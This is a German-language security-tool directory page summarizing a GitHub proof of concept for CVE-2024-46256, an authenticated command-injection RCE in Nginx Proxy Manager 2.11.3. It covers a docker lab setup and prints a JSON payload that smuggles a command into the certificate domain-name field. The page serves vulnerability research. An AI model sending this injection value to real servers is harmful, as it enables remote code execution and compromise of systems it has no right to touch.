Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-46256 — CVE-2024-46256 Werkzeug | Kitploit
Tools/GitHubGitHub/kimtangker/cve-2024-46256
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubkimtangker/cve-2024-46256

CVE-2024-46256

CVE-2024-46256 Werkzeug

Repository anzeigen
11vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-46256 Nginx Proxy Manager RCE Schwachstellenanalyse

Umgebungsaufbau

1. Ausführung der Nginx Proxy Manager 2.11.3 Umgebung


docker-compose up -d

Oder Sie können das automatische Skript verwenden:


python setup_environment.py

2. Zugriff auf den Nginx Proxy Manager

  • URL: http://localhost:81

  • Nach Abschluss der Ersteinrichtung den Test durchführen

  • Mit dem Standard-Administratorkonto anmelden (E-Mail: [email protected] / Passwort: changeme)

  • Zugriffsrechte für die Zertifikatsausstellungsfunktionen überprüfen

Schwachstelleninformationen

  • CVE ID: CVE-2024-46256

  • Produkt: Nginx Proxy Manager

  • Version: 2.11.3

  • Schwachstellentyp: Remote Code Execution (RCE)

  • CVSS: Hoch

PoC-Code

Der PoC führt dazu, dass ein authentifizierter Benutzer während des Zertifikatsausstellungsprozesses (z.B. Let's Encrypt) im Feld für den Domainnamen eine Template-/Befehlsinjektion durchführt und so eine RCE auslöst.

Beispiel-Payload (konzeptionelles Beispiel):

{
  "domain_names": ["test.com\"||{command}||\\n test.com\""],
  "meta": {
    "dns_challenge": false,
    "letsencrypt_agree": true,
    "letsencrypt_email": "[email protected]"
  },
  "provider": "letsencrypt"
}

Analyseumgebung

  • Betriebssystem: Windows 10

  • Docker: Aktuelle Version

  • Nginx Proxy Manager: 2.11.3

Tool herunterladen